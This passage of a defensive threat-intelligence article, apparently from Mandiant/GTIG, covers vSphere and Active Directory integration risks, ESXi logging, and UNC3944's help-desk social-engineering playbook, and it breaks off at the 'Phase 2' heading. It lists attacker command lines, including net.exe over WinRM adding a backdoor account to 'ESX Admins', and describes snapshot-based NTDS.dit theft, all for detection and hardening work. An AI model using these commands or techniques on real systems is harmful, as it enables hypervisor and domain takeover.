Consequently, most organizations focus their security efforts and EDR deployment inside the guest operating systems. This leaves the underlying ESXi hypervisor—the foundation of the entire virtualization environment—as a significant blind spot for security teams.
The vSphere Threat Landscape
The security gap at the hypervisor layer, which we detailed in the previous section, has not gone unnoticed by threat actors. As security for Windows-based operating systems matured with advanced EDR solutions, threat actors have pivoted to a softer, higher-value target—the ESXi hypervisor itself.
This pivot is amplified by common operational realities. The critical role of ESXi hosts often leads to a hesitancy to apply patches promptly for fear of disruption. Many organizations face a rapidly closing window to mitigate risks; however, threat actors aren’t just relying on unpatched vulnerabilities. They frequently leverage compromised credentials, a lack of MFA, and simple misconfigurations to gain access.
The Rise of Hypervisor-Aware Ransomware
Ransomware targeting vSphere is fundamentally more devastating than its traditional Windows counterpart. Instead of encrypting files on servers or end user compute, these attacks aim to cripple the entire infrastructure by encrypting virtual disk files (VMDKs), disabling dozens of VMs at once.
This is not a theoretical threat. According to Google Threat Intelligence Group (GTIG), the focus on vSphere is rapidly increasing. Of the new ransomware families observed, the proportion specifically tailored for vSphere ESXi systems grew from ~2% in 2022 to over 10% in 2024. This demonstrates a clear and accelerating trend that threat actors are actively dedicating resources to build tooling that specifically targets the hypervisor. In incidents investigated by GTIG, threat actors most frequently deployed REDBIKE, RANSOMHUB, and LOCKBIT.BLACK variants.
GTIG analysts have also noted a recent trend for threat actors to gain persistence to vSphere environments via reverse shells deployed on Virtual center. This enables a foothold to be obtained within the vSphere control plane and thus complete control over all infrastructure. This would typically manifest in into a two-pronged approach: a tactical data exfiltration such as an AD database (NTDS.dit) and then the deployment of ransomware and mass encryption of all VMs.
Understanding the Active Directory Integration in vSphere
The decision to integrate vSphere with AD often overlooks the specifics of how this connection actually works. To properly assess the risk, we must look beneath the surface at the technical components that enable this functionality. This analysis will deconstruct those key pieces: the legacy agent responsible for authentication, its inherent inability to support modern security controls like multi-factor authentication (MFA), and the insecure default trust relationships it establishes. By examining these foundational mechanisms, we can expose the direct line from a credential compromise to an infrastructure takeover.
vSphere’s Likewise Agent
When discussing vSphere’s integration with AD, it’s essential to distinguish between two separate components: vCenter Server and the ESXi hosts. Their respective AD integration options are independent and possess different capabilities. This connection is entirely facilitated by the Likewise agent.
The Likewise agent was originally developed by Likewise Software to allow Linux and Unix-based systems to join AD environments, enabling centralized identity management using standard protocols like Kerberos, NTLM, and LDAP/(S). The open-source edition, Likewise Open, included tools such as domainjoin-cli and system daemons like lsassd, which are still found under the hood in ESXi and the vCenter Server Appliance (VCSA). vSphere embedded this agent starting with ESX 4.1 (released in 2010) to facilitate Integrated Windows Authentication (IWA). However, its function differs:
In ESXi, the Likewise agent actively handles AD user authentication when configured.
In vCenter, it is only used for the initial domain join when Integrated Windows Authentication (IWA) is selected as the identity source—all actual authentication is then handled by the vCenter Single Single On (SSO) subsystem.
The original Likewise Software was eventually absorbed by BeyondTrust, and the open-source edition of the agent is no longer actively maintained publicly. The Likewise OSS project is now archived and marked as inactive. It is understood the codebase is only maintained internally. Note: The agent’s build version remains identical at Likewise Version 6.2.0 across both ESXi 7 and 8.
Figure 1: ESXi Likewise Agent versions
The following table lists comparisons between native AD connection methods for both Virtual Center and ESXi.
Feature / Capability
ESXi Host
vCenter Server (VCSA)
AD Integration Method
Integrated Windows Authentication (IWA) only
IWA and LDAP/LDAPS
Federated Identity (SAML, OIDC)
Likewise Agent Used
Yes – exclusively for IWA domain join and authentication
Yes – Used for IWA domain join only
Authentication Protocols Supported
Kerberos (via IWA only)
Kerberos (IWA), LDAP(S), SAML, OIDC
Modern Auth Support (OIDC, SAML, FIDO2)
Not supported
Not supported via AD
Supported onlywhen using federated IdPs
MFA Support
Not supported
Not supported viaAD DS
Supported via Identity Federation (ADFS, Azure AD, etc.)
Granular Role-Based Access Control (RBAC)
Limited (via host profile or CLI only)
Advanced RBAC with vCenter SSO
Why Not to Use Likewise-Based AD Integration (ESXi/vCenter)
The following list contains considerations when using AD-based connections managed by the vSphere Likewise agent:
Deprecated software: Likewise is legacy software, no longer maintained or supported upstream.
No support for modern authentication: Likewise only supports Integrated Windows Authentication (Kerberos) and offers no support for SAML, OIDC, or FIDO2.
No MFA: Likewise cannot enforce contextual policies such as MFA, geolocation restrictions, or time-based access.
Credential material stored locally: Kerberos keytabs and cached credentials are stored unencrypted on disk.
VMware recommends leveraging identity federation with modern identity providers, bypassing the limitations of the legacy Likewise-based stack. Broadcom announced on March 25 that IWA will be removed in the next major release.
The MFA Gap
While AD integration offers administrative convenience, it introduces significant security limitations, particularly regarding MFA. Traditional AD authentication methods, including Kerberos and NTLM, are inherently single-factor. These protocols do not natively support MFA, and the vCenter Likewise integration does not extend AD MFA enforcement to vCenter or ESXi.
Critically, ESXi does not support MFA in any form, nor does it support identity federation, SAML, or modern protocols such as OIDC or FIDO2. Even for vCenter, MFA can only be applied to users within the vSphere.local domain (using mechanisms like RSA SecurID or RADIUS), but not to AD-joined users authenticated through IWA or LDAP/S.
Ancillary solutions can offer proxy-based MFA that integrate with AD to enforce MFA to vSphere. AuthLite extends the native AD login process by requiring a second factor during Windows authentication, which can indirectly secure vCenter access when Integrated Windows Authentication is used. Silverfort operates at the domain controller level, enforcing MFA on authentication flows in real time without requiring agents on endpoints or changes to vCenter. Both solutions can help enforce MFA into vSphere environments that lack native support for it, but they can also introduce caveats such as added complexity and potential authorization loops if AD becomes dependent on the same infrastructure they protect and the need to treat their control planes or virtual appliances as Tier 0 systems within the vSphere environment.
As a result, in organizations that integrate vSphere with traditional Active Directory, all access to critical vSphere infrastructure (ESXi and Virtual Center) remains protected by password alone and no MFA.
While it is technically possible to enforce MFA in vSphere through Active Directory Federation Services (ADFS), this approach requires careful consideration. It is important to note that ADFS is still a feature included in Windows Server 2025 and is not on any official deprecation list with an end-of-life date. However, the lack of significant new feature development compared to the rapid innovation in Microsoft Entra ID speaks to its status as a legacy technology. This is underscored by the extensive migration resources Microsoft now provides to move applications away from AD FS and into Entra ID.
Therefore, while ADFS remains a supported feature, for the purposes of securing vSphere it is a complex workaround that doesn’t apply to direct ESXi access and runs contrary to Microsoft’s clear strategic direction toward modern, cloud-based identity solutions.
Another common approach involves Privileged Access Management (PAM). While a PAM-centric strategy offers benefits like centralized control and session auditing, several caveats warrant consideration. PAM systems add operational complexity, and the vCenter session itself is typically not directly federated with the primary enterprise identity provider (like Entra ID or Okta). Consequently, context-aware conditional access policies are generally applied only at the initial PAM logon, not within the vCenter session itself.
Ultimately, these workarounds do not address the core issue: vSphere’s reliance on the Likewise agent and traditional AD protocols prevents native MFA enforcement for AD users, leaving the environment vulnerable.
There is a reliance on a delegated logon based on AD password complexity, and any MFA would have to be at the network access layer or workstation login, not at the vCenter login prompt for those users.
The ‘ESX Admins’ Problem Is Not an ESXi Issue, It’s a Trust Issue
In July 2024, Microsoft published a blog post on CVE-2024-37085, an “ESXi vulnerability” that was considered a critical issue, and one that vSphere promptly addressed in a patch release. The CVE, present in vSphere ESXi for many years, involved several ESXi advanced settings utilizing insecure default configurations. Upon joining an ESXi host to an AD domain, the “ESX Admins” AD group is automatically granted an ESXi Admin role, potentially expanding the scope of administrative access beyond the intended users.
These settings are configured by the following ESXi controls:
What it does: This setting controls whether users from a designated administrators group are automatically added to the host’s local administrative group.
What it does: This setting defines the time interval at which the host’s management services validate the authentication credentials (or tickets) of connected clients.
Config.HostAgent.plugins.hostsvc.esxAdminsGroup
What it does: This parameter specifies the name (or identifier) of the group whose members are to be automatically considered for host administrative privileges (when auto-add is enabled by the first setting).
Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false
Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90
Config.HostAgent.plugins.hostsvc.esxAdminsGroup from “ESX Admins” to “”
The following is a configuration fix to default settings in vSphere ESXi 8.0 Update 3:
Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false
Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90
Config.HostAgent.plugins.hostsvc.esxAdminsGroup no change “ESX Admins”
Integrating an ESXi host with Microsoft AD introduces a fundamental security issue that is often overlooked—the IdP’s administrators effectively gain administrative control over the ESXi host and any other system relying on that trust. While a common perception, sometimes reinforced by narratives focusing on the endpoint, suggests the ESXi host itself is the primary vulnerability, the more critical security concern is the implicit, far-reaching administrative power wielded by the administrators of the trusted IdP, particularly when using AD authentication with ESXi.
Administrators of Active Directory implicitly become administrators of any ESXi host that trusts it.
Consequently, neither workarounds nor configuration fixes, which only adjust default settings, resolve this core problem when an ESXi host is joined to AD. The issue transcends specific CVEs; it stems from the inherent security implications of the implicit trust model itself, particularly when it involves systems like ESXi and AD, which already possess their own security vulnerabilities and are frequent targets for threat actors.
In respect of ESXi, context should be applied to the following:
Automatic full administrative access: When ESXi hosts are joined to AD, a default (or custom configured) AD group (e.g., “ESX Admins”) is granted full root-level administrative privileges on the ESXi hosts. Any member of this AD group instantly gains unrestricted control of the ESXi host.
Group name: If AD is compromised, threat actors can manipulate anygroup name used for via the the Config.HostAgent.plugins.hostsvc.esxAdminsGroup advanced setting, This is not limited to the group name “ESX Admins.”
Lack of security identifier (SID) tracking: AD group names (not limited to “ESX Admins”) added to ESXi are not tracked by their SIDs. This means that a threat actor could rename or recreate a deleted AD group such as “ESX Admins” maintaining the same name in ESXi via Config.HostAgent.plugins.hostsvc.esxAdminsGroup and retain the elevated privileges. This is a limitation of the Likewise ESXi agent.
Active Directory group management. Any threat actor looking to access a domain-joined ESXi host would need to simply require sufficient permissions to add themselves to the AD group defined via Config.HostAgent.plugins.hostsvc.esxAdminsGroup.
Recent discussions around vulnerabilities like CVE-2024-37085 have brought this security issue to the forefront: the inherent dangers of joining vSphere ESXi hosts directly to an AD domain. While such integration offers perceived management convenience, it establishes a level of trust that can be easily exploited.
Why Your ESXi Hosts Should Never Be Active Directory Domain Joined
Based on previous discussions we can confidently establish that joining an ESXi host to AD carries substantial risk. This is further endorsed where there is an absence of comprehensive ESXi security controls such as Secure Boot, TPM, execInstalledOnly, vCenter integration, comprehensive logging and SIEM integration. Compromised AD credentials tied to an ESXi-joined group will allow remote threat actors to readily exploit the elevated privileges, executing actions such as virtual machine shutdown and ransomware deployment via SSH. These risks can be summarized as follows:
No MFA support: ESXi does not support MFA for AD users. Domain joining exposes critical hypervisor access to single-factor password-based authentication.
Legacy authentication protocols: ESXi relies on IWA and Kerberos / NTLM / Windows Session Authentication (SSPI)—outdated protocols vulnerable to various attacks, including pass-the-hash and credential relay.
Likewise agent is deprecated: The underlying Likewise agent is a discontinued open-source project. Continued reliance on it introduces maintenance and security risks.
No modern authentication integration: ESXi does not support federated identity, SAML, OIDC, FIDO2, or conditional access.
AD policy enforcement is absent: Group Policy Objects (GPOs), conditional access, and login time restrictions do not extend to ESXi via AD join, undermining centralized security controls.
Complexity without benefit: Domain joining adds administrative overhead without offering meaningful security gains — especially when using vCenter as the primary access point.
Limited role mapping granularity: Group-based role mappings on ESXi are basic and cannot match the RBAC precision available in vCenter, reducing access control fidelity.
To securely remove ESXi hosts from AD, a multistep process is required to shift access management explicitly to vCenter. This involves assessing current AD usage, designing granular vCenter roles, configuring vCenter’s RBAC, removing hosts from the domain via PowerCLI, and preventing future AD re-integration. All management then moves to vCenter, with direct ESXi access minimized. This comprehensive approach prioritizes security and efficiency by moving away from AD reliance for ESXi authentication and authorization towards a vCenter-centric, granular RBAC model. vSphere explicitly discourages joining ESXi hosts to AD:
“ESXi can be joined to an Active Directory domain as well, and that functionality continues to be supported. We recommend directing all configuration & usage through the Role-Based Access Controls (RBAC) present in vCenter Server, though.”
vSphere vCenter Server represents a strategic objective for threat actors due to its authoritative role as the centralized management for virtualized infrastructure. A compromised vCenter instance effectively cedes comprehensive administrative control over the entire virtual estate, encompassing all connected ESXi hypervisors, virtual machines, datastores, and virtual network configurations.
Through its extensive Application Programming Interfaces (APIs), adversaries can programmatically manipulate all managed ESXi hosts and their resident virtual machines, enabling actions such as mass ransomware deployment, large-scale data exfiltration, the provisioning of rogue virtual assets, or the alteration of security postures to evade detection and induce widespread operational disruption.
Furthermore, the vCenter Server appliance itself can be subverted by implanting persistent backdoors, thereby establishing covert command-and-control (C2) channels that allow for entrenched persistence and continued malicious operations. Consequently, its critical function renders vCenter a high-value target. The following should be considered:
Coupled security dependency (compromise amplification risk): Directly linking vCenter to AD makes vSphere security dependent on AD’s integrity. As AD is a prime target, compromising privileged AD accounts mapped to vCenter grants immediate, potentially unrestricted administrative access to the virtual infrastructure, bypassing vSphere-specific security layers. Insufficient application of least privilege for AD accounts in vSphere magnifies this risk.
Single-factor authentication weakness (credential compromise risk): Relying solely on AD password validation makes vCenter highly vulnerable to common credential compromise methods (phishing, brute-force, spraying, stuffing, malware). Without mandatory MFA, a single stolen password for a privileged AD account allows complete authentication bypass, enabling unauthorized access, data breaches, ransomware, or major disruptions.
Lack of native MFA: The direct vsphere.local-to-AD integration offers no built-in enforcement of strong authentication like phishing resistant FIDO2 . While compatibility exists for external systems (Smart Cards, RSA SecurID), these require separate, dedicated infrastructure and are not inherent features, leaving a significant authentication assurance gap if unimplemented.
Facilitation of lateral movement and privilege escalation: Compromised AD credentials, even non-administrative ones with minimal vSphere rights, allow threat actors initial vCenter access. vCenter can then be exploited as a pivot point for further network infiltration, privilege escalation within the virtual environment, or attacks on guest systems via console/API access, all stemming from the initial single-factor credential compromise.
Integrating vSphere vCenter directly with AD for identity management, while common, inherently introduces significant security vulnerabilities stemming from coupled dependencies, reliance on single-factor authentication, a lack of native strong MFA, and facilitated attack pathways. These not only critically expose the virtual infrastructure but also provide avenues to exploit the VCSA appliance’s attack surface, such as its underlying Linux shell and the lack of comprehensive endpoint detection and response (EDR) capabilities.
Securing vSphere: The Tier 0 Challenge
The widespread practice of running Tier 0 services—most critically, AD domain controllers (often used for direct Identity integration)—directly on vSphere hypervisors introduces a significant and often overlooked security risk. By placing Active Directory Domain Controllers on vSphere, any successful attack against the hypervisor effectively hands threat actors the keys to the entire AD environment, enabling complete domain takeover. Mandiant observes that a general lack of awareness and proactive mitigation persists.
The danger is significant and present, for example, even for vSphere permissions that appear low-risk or are operationally common. For example, the privilege to snapshot an AD virtual machine can be weaponized for complete AD takeover. This specific vSphere capability, often assigned for backup routines, enables offline NTDS.dit (AD database) exfiltration. This vSphere-level action renders many in-guest Windows Server security controls ineffective, bypassing not only traditional measures like strong passwords and MFA, but also advanced protections such as LSASS credential guard and EDR, which primarily monitor activity within the operating system. This effectively paves a direct route to full domain compromise for a threat actor possessing this specific permission.
Mandiant observed these tactics, techniques, and procedures (TTPs) attributed to various ransomware groups across multiple incidents. The absence of VM encryption and logging makes this a relatively simple task to obtain the AD database while being undetected.
The following table contains a list of sample threats matched to related permissions:
Threat
Risk
Minimum vSphere Permission Required
Unencrypted vMotion
Memory-in-transit (e.g., LSASS, krbtgt hashes) can be captured during migration.
Role: Virtual Machine Power User or higher Permission: Host > Inventory > Migrate powered on virtual machine
Unencrypted VM Disks
AD database (NTDS.dit), registry hives, and password hashes can be stolen from VMDKs.
Role: Datastore Consumer, VM Admin or higher. Permission Datastore > Browse, Datastore > Low level file operations
Snapshot Creation
Snapshots preserve memory and disk state; can be used to extract in-memory credentials.
Role: Virtual Machine Power User or higher. Permission: Virtual Machine > State > Create Snapshot
Mounting VMDK to another VM
Enables offline extraction of AD secrets (e.g., NTDS.dit, registry, SYSVOL).
Role: VM Admin or custom with disk-level access. Permission Virtual Machine > Configuration > Add existing disk, Datastore > Browse
Exporting / Cloning VM
Enables offline AD analysis, allowing credential extraction or rollback attacks.
Delegation of trust from vSphere vCenter to AD grants implicit administrator privileges on the trusted systems to any AD domain administrator. This elevates the risk profile of AD compromise, impacting the entire infrastructure. To mitigate this, implement a two-pronged strategy: first, create a separate, dedicated vSphere environment specifically for the most critical Tier 0 assets, including AD. This isolated environment should be physically or logically separated from other systems and highly secured with robust network segmentation. Second, implement a zero-trust security model for the control plane of this environment, verifying every access request regardless of source. Within this isolated environment, deploy a dedicated “infrastructure-only” IdP (on-premises or cloud). Implementing the principle of least privilege is paramount.
A dedicated, isolated vSphere environment for Tier 0 assets (e.g., Active Directory) should have strictly limited administrative access (via a PAW), granting permissions only to those directly managing the infrastructure. This significantly reduces the impact of a breach by preventing lateral movement and minimizing damage. Unnecessary integrations should be avoided to maintain the environment’s security and adhere to the least-privilege model.
To effectively safeguard critical Tier 0 assets operating within the vSphere environment–specifically systems like Privileged Access Management (PAM), Security Information and Event Management (SIEM) virtual appliances, and any associated AD tools deployed as virtual appliances–a multilayered security approach is essential. These assets must be treated as independent, self-sufficient environments. This means not only isolating their network traffic and operational dependencies but also, critically, implementing a dedicated and entirely separate identity provider (IdP) for their authentication and authorization processes. For the highest level of assurance, these Tier 0 virtual machines should be hosted directly on dedicated physical servers. This practice of physical and logical segregation provides a far greater degree of separation than shared virtualized environments.
The core objective here is to break the authorization dependency chain, ensuring that credentials or permissions compromised elsewhere in the network cannot be leveraged to gain access to these Tier 0 systems. This design creates defense in depth security barriers, fundamentally reducing the likelihood and impact of a complete system compromise.
Conclusion
Mandiant has observed that threat actors are increasingly targeting vSphere, not just for ransomware deployment, but also as a key avenue for data exploitation and exfiltration. This shift is demonstrated by recent threat actor activity observed by GTIG, where adversaries have leveraged compromised vSphere environments to exfiltrate sensitive data such as AD databases before or alongside ransomware execution.
As this document has detailed, the widespread reliance on vSphere, coupled with often underestimated risks inherent in its integration with AD and the persistence of insecure default configurations, creates a dangerously vulnerable landscape. Threat actors are not only aware of these weaknesses but are actively exploiting them with sophisticated attacks increasingly targeting ESXi and vCenter to achieve maximum impact.
The usability and stability that make vSphere a foundational standard for on-premise and private clouds can be misleading; they do not equate to inherent security. The evolution of the threat landscape, particularly the direct targeting of the hypervisor layer which bypasses traditional endpoint defenses, necessitates a fundamental shift in how vSphere security is approached. Relying on outdated practices, backups, perimeter defenses alone, or assuming EDR on guest VMs provides sufficient protection for the underlying infrastructure creates significant security gaps and exposes an organization to severe risks.
Identity integration vulnerabilities will be exploited, therefore, organizations are strongly urged to immediately assess their vSphere environment’s AD integration status and decisively prioritize the implementation of the mitigation strategies outlined in this document. This proactive stance is crucial to effectively counter modern threats and includes:
Decoupling critical dependencies: Severing direct ESXi host integration with AD is paramount to shrinking the AD attack surface.
Modernizing authentication: Implementing robust, phishing-resistant MFA for vCenter, preferably via identity federation with modern IdPs, is no longer optional but essential.
Systematic hardening: Proactively addressing the insecure defaults for ESXi and vCenter, enabling features like execInstalledOnly, Secure Boot, TPM, Lockdown Mode, and configuring stringent firewall rules.
Enhanced visibility: Implementing comprehensive remote logging for both ESXi and vCenter, feeding into a SIEM with use cases specifically designed to detect hypervisor-level attacks.
Protecting Tier 0 assets: Strategically isolating critical workloads like Active Directory Domain Controllers in dedicated, highly secured vSphere environments with strict, minimized access controls and encrypted VMs and vMotion.
The upcoming end-of-life for vSphere 7 in October 2025 means that vast numbers of organizations will not be able to receive product support, security patches and updates for a product that underpins Infrastructure. This presents a critical juncture for organizations and a perfect storm for threat actors. The transition away from vSphere 7 should be viewed as a key opportunity to re-architect for security, not merely a routine upgrade to implement new features and obtain support. Failure to proactively address these interconnected risks by implementing these recommended mitigations will leave organizations exposed to targeted attacks that can swiftly cripple their entire virtualized infrastructure, leading to operational disruption and financial loss. The time to adopt a resilient, defense-in-depth security posture to protect these critical vSphere environments is unequivocally now.
In mid 2025, Google Threat Intelligence Group (GITG) identified a sophisticated and aggressive cyber campaign targeting multiple industries, including retail, airline, and insurance. This was the work of UNC3944, a financially motivated threat group that has exhibited overlaps with public reporting of “0ktapus,” “Octo Tempest,” and “Scattered Spider.” Following public alerts from the Federal Bureau of Investigation (FBI), the group’s targeting became clear. GTIG observed that the group was suspected of turning its ransomware and extortion operations to the U.S. retail sector. The campaign soon broadened further, with airline and transportation organizations in North America having also become targets.
The group’s core tactics have remained consistent and do not rely on software exploits. Instead, they use a proven playbook centered on phone calls to an IT help desk. The actors are aggressive, creative, and particularly skilled at using social engineering to bypass even mature security programs. Their attacks are not opportunistic but are precise, campaign-driven operations aimed at an organization’s most critical systems and data.
Their strategy is rooted in a “living-off-the-land” (LoTL) approach. After using social engineering to compromise one or more user accounts, they manipulate trusted administrative systems and use their control of Active Directory as a launchpad to pivot to the vSphere vSphere environment thus providing an avenue to exfiltrate data and deploy ransomware directly from the hypervisor. This method is highly effective as it generates few traditional indicators of compromise (IoCs) and bypasses security tools like endpoint detection and response (EDR), which often have limited or no visibility into the ESXi hypervisor and vCenter Server Appliance (VCSA).
Before discussing key detection signals and hardening strategies related to UNC3944’s vSphere-related operations, it’s important to understand vSphere logging and the distinction between vCenter Events and ESXi host logs. When forwarded to a central syslog server, vCenter Server events and ESXi host logs represent two distinct yet complementary sources of data. Their fundamental difference lies in their scope, origin, and the structured, event-driven nature of vCenter logs versus the verbose, file-based output of ESXi.
1. vCenter Server (VC Events)
vCenter events operate at the management plane, providing a structured audit trail of administrative actions and automated processes across the entire virtual environment. Each event is a discrete, well-defined object identified by a unique eventTypeId, such as VmPoweredOnEvent or UserLoginSessionEvent. This programmatic identification makes them ideal for ingestion into Security Information and Event Management (SIEM) platforms like Splunk or Google Chronicle for automated parsing, alerting, and security analysis.
Figure 1: VC Event log structure
Native storage & syslog forwarding: These events are generated by vCenter Server and stored within its internal VCSA database (PostgreSQL). When forwarded, vCenter streams a real-time copy of these structured events to the syslog server. The resulting log message typically contains the formal eventTypeId along with its human-readable description, allowing for precise analysis.
Primary use cases:
Security auditing & forensics: Tracking user actions, permission changes, and authentication
Change management: Providing a definitive record of all configuration changes to clusters, hosts, and virtual machines (VMs)
Automated alerting: Triggering alerts in a SIEM or monitoring tool based on specific eventTypeIds (e.g., HostCnxFailedEvent)
Examples of vCenter EventsAs documented in resources like thevCenter Event Mapping repository, each event has a specific programmatic identifier.
UserLoginSessionEvent
Description: “User {userName}@{ipAddress} logged in as {locale}”
Significance: A critical security event for tracking all user access to the vCenter management plane
VmCreatedEvent
Description: “Created virtual machine {vm.name} on {host.name} in {datacenter.name}”
Significance: Logs the creation of new inventory objects, essential for asset management and change control
VmPoweredOffEvent
Description: “Virtual machine {vm.name} on {host.name} in {datacenter.name} is powered off”
Significance: Tracks the operational state and availability of workloads. An unexpected power-off event is a key indicator for troubleshooting.
Note on VCSA Logging Limitations: The VCSA does not, out-of-the-box, support forwarding critical security logs for denied network connections or shell command activity. To enable this non-default capability, a custom configuration at the native Photon OS level is required. This is an agentless approach that leverages only built-in Linux tools (like iptables and logger) and does not install any third-party software. This configuration pipes firewall and shell events into the VCSA’s standard rsyslog service, allowing the built-in remote logging mechanism to forward them to a central SIEM.
2. ESXi Host Logs
ESXi logs operate at the hypervisor level, providing granular, host-specific operational data. They contain detailed diagnostic information about the kernel, hardware, storage, networking, and services running directly on the ESXi host.
Native storage: These logs are enabled by default and stored as a collection of plain text files on the ESXi host itself, primarily within the /var/log/ directory. This storage is often a local disk or a persistent scratch partition. If a persistent location is not configured, these logs are ephemeral and will be lost upon reboot, making syslog forwarding essential for forensics.
Figure 2: ESXi standard log structure
Primary use cases:
Deep-dive troubleshooting of performance issues
Diagnosing hardware failures or driver issues
Analyzing storage and network connectivity problems
Examples of ESXi log entries sent to syslog:
(from vmkernel.log): Detailed logs about storage device latency
(from hostd.log): Logs from the host agent, including API calls, VM state changes initiated on the host, and host service activity
(fromauth.log): Records of successful or failed login attempts directly to the host via SSH or the DCUI
3. ESXi Host Audit Logs
ESXi audit records provide a high-fidelity, security-focused log of actions performed directly on an ESXi host. The following analysis of the provided example demonstrates why this log source is forensically superior to standard logs for security investigations. These logs are not enabled by default.
Native storage & persistence: These records are written to audit.*.log on the host’s local filesystem, governed by the Syslog.global.auditRecord.storageEnable = TRUE parameter. Persistent storage configuration is critical to ensure this audit trail survives a reboot.
Figure 3: ESXi audit log structure
Forensic analysis: standard vs. audit log: In the provided scenario, a threat actor logs into an ESXi host, attempts to run malware, and disables the execInstalledOnly security setting. Here is how each log type captures this event:
Standard syslogshell.log analysis: The standard log provides a simple, chronological history of commands typed into the shell.
Figure 4: ESXi standard log output
Limitations:
No login context: It does not show the threat actors source IP address or that the initial SSH login was successful.
No outcome: It shows the command ./malware was typed but provides no information on whether it succeeded or failed.
Incomplete narrative: It is merely a command history, lacking the essential context needed for a full security investigation.
ESXi audit log analysis: The ESXi audit log provides a rich, structured, and verifiable record of the entire session, from connection to termination, including the outcome of each command.
Figure 5: ESXi audit log output
Successful login: It explicitly records the successful authentication, including the source IP.
Failed malware execution: This is the most critical distinction. The audit log shows that the malware execution failed with an exit status of 126.
Successful security disablement: It then confirms that the command to disable a key security feature was successful.
This side-by-side comparison proves that while standard ESXi logs show a threat actor’s intent, the ESXi audit log reveals the actual outcome, providing actionable intelligence and a definitive forensic trail. A comprehensive logging strategy for a vSphere environment requires the collection and analysis of three distinct yet complementary data sources. When forwarded to a central syslog server, vCenter Server events, ESXi host audit records, and standard ESXi operational logs provide a multilayered view of the environment’s security, administrative changes, and operational health.
Characteristic
vCenter Server Events
ESXi Audit Logs
ESXi Standard Logs
Scope
Virtual Center, ESXI
ESXi
ESXi
Enabled by Default
Yes
No
Yes
Format
Structured Objects (eventTypeId)
Verbose, Structured Audit Entries
Unstructured/Semi-structured Text
Type
Administrative, Management, Audit
Security Audit, Kernel-level Actions
Management, System-Level State
Primary Storage
VCSA Internal Database
Local Filesystem (audit.log)
Local Filesystem (/var/log/)
Primary Use Case
Central Auditing, Full Cluster Management, Forensics
Direct Host Forensics, Compliance
Deep Troubleshooting, Diagnostics
Table 1: Comparison of ESXi Logs and vCenter Events
Anatomy of an Attack: The Playbook
UNC3944’s attack unfolds across five distinct phases, moving methodically from a low-level foothold to complete hypervisor control.
Figure 6: Typical UNC3944 attack chain
Phase 1: Initial Compromise, Recon, and Escalation
This initial phase hinges on exploiting the human element.
The tactic: The threat actor initiates contact by calling the IT help desk, impersonating a regular employee. Using readily available personal information from previous data breaches and employing persuasive or intimidating social engineering techniques, they build rapport and convince an agent to reset the employee’s Active Directory password. Once they have this initial foothold, they begin a two-pronged internal reconnaissance mission:
Path A (information stores): They use their new access to scan internal SharePoint sites, network drives, and wikis. They hunt for IT documentation, support guides, org charts, and project plans that reveal high-value targets. This includes not only the names of individual Domain or vSphere administrators, but also the discovery of powerful, clearly named Active Directory security groups like “vSphere Admins” or “ESX Admins” that grant administrative rights over the virtual environment.
Path B (secrets stores): Simultaneously, they scan for access to password managers like HashiCorp Vault or other Privileged Access Management (PAM) solutions. If they find one with weak access controls, they will attempt to enumerate it for credentials.
Armed with the name of a specific, high-value administrator, they make additional calls to the help desk. This time, they impersonate the privileged user and request a password reset, allowing them to seize control of a privileged account.
Why it’s effective: This two-step process bypasses the need for technical hacking like Kerberoasting for the initial escalation. The core vulnerability is a help desk process that lacks robust, non-transferable identity verification for password resets. The threat actor is more confident and informed on the second call, making their impersonation much more likely to succeed.
Key detection signals:
[LOGS] Monitor for command-line and process execution: Implement robust command-line logging (e.g., via Audit Process Creation, Sysmon Event ID 1 or EDR). Create alerts for suspicious remote process execution, such as wsmprovhost.exe (WinRM) launching native tools like net.exe to query or modify sensitive groups (e.g., net group "ESX Admins" /add).
[LOGS] Monitor for group membership changes: Create high-priority alerts for AD Event ID 4728 (A member was added to a security-enabled global group) or 4732 (local group) for any changes to groups named “vSphere Admins,” “ESX Admins,” or similar.
[LOGS] Correlate AD password resets with help desk activity: Correlate AD Event ID 4724 (Password Reset) and the subsequent addition of a new multi-factor authentication (MFA) device with help desk ticket logs and call records.
[BEHAVIOR] Alert on anomalous file access: Alert on a single user accessing an unusually high volume of disparate files or SharePoint sites, which is a strong indicator of the reconnaissance seen during UNC3944 activity.
[CRITICAL BEHAVIOR] Monitor Tier 0 account activity: Any password reset on a Tier 0 account (Domain Admin, Enterprise Admin, vSphere) must be treated as a critical incident until proven otherwise.
Critical hardening and mitigation:
[CRITICAL] Prohibit phone-based resets for privileged accounts: For all Tier 0 accounts, enforce a strict “no password resets over the phone” policy. These actions must require an in-person, multipart, or high-assurance identity verification process.
Protect and monitor privileged AD groups: Treat these groups as Tier 0 assets: tightly control who can modify their membership and implement the high-fidelity alerting for any membership change (AD Event ID 4728/4732). This is critical as threat actors will use native tools like net.exe, often via remote protocols like WinRM, to perform this manipulation. Avoid using obvious, non-obfuscated names like “vSphere Admins” for security groups that grant high-level privileges
Harden information stores: Implement data loss prevention (DLP) and data classification to identify and lock down sensitive IT documentation that could reveal high-value targets. Treat secrets vaults as Tier 0 assets with strict, least-privilege access policies.
Restrict or monitor remote management tools: Limit the use of remote management protocols like WinRM and vSphere management APIs to authorized administrative subnets and dedicated PAWs. Log all remote commands for review and anomaly detection.
Table 2 displays threat actors actions in support of Active Directory escalation along with process and command-line data that an organization may use to detect this activity.
Process Name
Command Line
Tactic
Threat Actor’s Goal
explorer.EXE
“C:Program Files…WORDPAD.EXE” “10.100.20.55c$Usersj.doe…ACME Power DivisionDocumentsProcedure for Deploying ESXi…docx”
Reconnaissance
Threat actor, using a compromised user account, opens IT procedure documents to understand the vSphere environment and find target names.
Threat actor continues recon, opening files on a management server that likely contain names of systems, groups, or administrators.
wsmprovhost.exe
“C:…net.exe” group “ESX Admins”
Enumeration
Having found the group name, the threat actors use WinRM to remotely query the membership of the “ESX Admins” group to identify targets.
wsmprovhost.exe
“C:…net.exe” group “ESX Admins” ACME-CORPtemp-adm-bkdr /add
Manipulation
This is the key attack. The threat actor adds their controlled account (temp-adm-bkdr) to the “ESX Admins” group, granting it full admin rights to vSphere.
wsmprovhost.exe
“C:…net.exe” group “ESX Admins”
Verification
The threat actor queries the group again immediately after the modification to confirm that their malicious user was successfully added.
Table 2: Active Directory user escalation
Phase 2: The Pivot to vCenter — The Control Plane Compromise
